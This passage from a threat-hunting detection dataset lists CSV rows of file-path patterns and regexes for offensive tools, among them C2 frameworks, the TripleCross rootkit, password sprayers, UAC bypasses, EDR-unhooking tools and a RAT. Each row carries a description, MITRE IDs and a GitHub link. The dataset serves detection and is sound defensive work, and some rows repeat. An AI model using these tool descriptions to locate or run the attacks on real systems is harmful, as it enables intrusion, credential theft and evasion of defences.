T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/tricky.lnk.git*",".{0,1000}\/tricky\.lnk\.git.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","1","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*/tricky.ps1*",".{0,1000}\/tricky\.ps1.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. 
the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","1","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*/tricky.vbs*",".{0,1000}\/tricky\.vbs.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","1","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*/tricky2.ps1*",".{0,1000}\/tricky2\.ps1.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","1","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*/tried_logins.txt*",".{0,1000}\/tried_logins\.txt.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*/TriggerLinux/*",".{0,1000}\/TriggerLinux\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/TripleCross.git*",".{0,1000}\/TripleCross\.git.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","1","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*/TripleCross/apps/*",".{0,1000}\/TripleCross\/apps\/.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*/TripleCross-0.1.0.zip*",".{0,1000}\/TripleCross\-0\.1\.0\.zip.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","1","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*/TripleCross-0.1.0/*",".{0,1000}\/TripleCross\-0\.1\.0\/.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*/trollsploit/*",".{0,1000}\/trollsploit\/.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1154","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/TROUBLE-1/Vajra*",".{0,1000}\/TROUBLE\-1\/Vajra.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","352","59","2024-03-21T06:25:58Z","2022-03-01T14:31:27Z" "*/TruffleSnout.exe*",".{0,1000}\/TruffleSnout\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/trusted_sec_bofs/*",".{0,1000}\/trusted_sec_bofs\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/trusted_sec_remote_bofs/*",".{0,1000}\/trusted_sec_remote_bofs\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/trustedsec/*",".{0,1000}\/trustedsec\/.{0,1000}","offensive_tool_keyword","Github Username","github repo hosting various exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/trustedsec","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tso-brute.nse*",".{0,1000}\/tso\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tso-enum.nse*",".{0,1000}\/tso\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tunnel.nosocket.php*",".{0,1000}\/tunnel\.nosocket\.php.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. 
Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2936","814","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" "*/tunnel.tomcat.5.jsp*",".{0,1000}\/tunnel\.tomcat\.5\.jsp.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2936","814","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" "*/tunnel-socks5.py*",".{0,1000}\/tunnel\-socks5\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*/TunnelVision.git*",".{0,1000}\/TunnelVision\.git.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","9","7","N/A","N/A","N/A","N/A" "*/TunnelVisionVM.ova*",".{0,1000}\/TunnelVisionVM\.ova.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","9","7","N/A","N/A","N/A","N/A" "*/turbo-intruder-all.jar*",".{0,1000}\/turbo\-intruder\-all\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network 
Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","0","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*/tweetshell.sh*",".{0,1000}\/tweetshell\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2856","292","2024-03-24T09:16:18Z","2019-03-28T18:07:05Z" "*/twittor.git*",".{0,1000}\/twittor\.git.{0,1000}","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","752","216","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" "*/uac.py*",".{0,1000}\/uac\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/UACBypass.dll*",".{0,1000}\/UACBypass\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/UACBypasses/*",".{0,1000}\/UACBypasses\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 
- T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*/UACME.git*",".{0,1000}\/UACME\.git.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5924","1287","2024-04-17T00:56:06Z","2015-03-28T12:04:33Z" "*/UAC-SilentClean/*",".{0,1000}\/UAC\-SilentClean\/.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","175","28","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" 
"*/UAC-TokenMagic.ps1*",".{0,1000}\/UAC\-TokenMagic\.ps1.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*/uberfile.py*",".{0,1000}\/uberfile\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/ubiquiti-discovery.nse*",".{0,1000}\/ubiquiti\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/udmp-parser.git*",".{0,1000}\/udmp\-parser\.git.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","1","N/A","6","2","172","24","2024-02-25T13:18:10Z","2022-01-30T18:56:21Z" "*/UefiShell.iso*",".{0,1000}\/UefiShell\.iso.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - 
TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*/umeshshinde19/instainsane*",".{0,1000}\/umeshshinde19\/instainsane.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","1","N/A","7","6","519","335","2024-02-11T10:29:05Z","2018-12-02T22:48:11Z" "*/unDefender.exe*",".{0,1000}\/unDefender\.exe.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","321","77","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" "*/unDefender.git*",".{0,1000}\/unDefender\.git.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","321","77","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" "*/undertheradar.git*",".{0,1000}\/undertheradar\.git.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*/unhook-bof*",".{0,1000}\/unhook\-bof.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected 
shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","941","169","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*/unhook-bof*",".{0,1000}\/unhook\-bof.{0,1000}","offensive_tool_keyword","cobaltstrike","Remove API hooks from a Beacon process.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/unhook-bof","1","1","N/A","10","10","50","14","2022-03-13T15:57:10Z","2021-07-02T14:55:38Z" "*/unhook-bof*",".{0,1000}\/unhook\-bof.{0,1000}","offensive_tool_keyword","cobaltstrike","Remove API hooks from a Beacon process.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/unhook-bof","1","1","N/A","10","10","256","57","2021-09-18T18:12:41Z","2021-01-13T02:20:44Z" "*/UnhookingPatch.git*",".{0,1000}\/UnhookingPatch\.git.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","1","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*/UnhookingPatch.git*",".{0,1000}\/UnhookingPatch\.git.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall 
instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*/unicorn.git*",".{0,1000}\/unicorn\.git.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3633","813","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z" "*/unicorn.py*",".{0,1000}\/unicorn\.py.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3633","813","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z" "*/unittest.nse*",".{0,1000}\/unittest\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/UnlinkDLL.git*",".{0,1000}\/UnlinkDLL\.git.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","1","N/A","7","1","54","11","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z" "*/UnmanagedPowerShell.git*",".{0,1000}\/UnmanagedPowerShell\.git.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","1","N/A","6","5","461","108","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z" "*/unshackle.git*",".{0,1000}\/unshackle\.git.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords 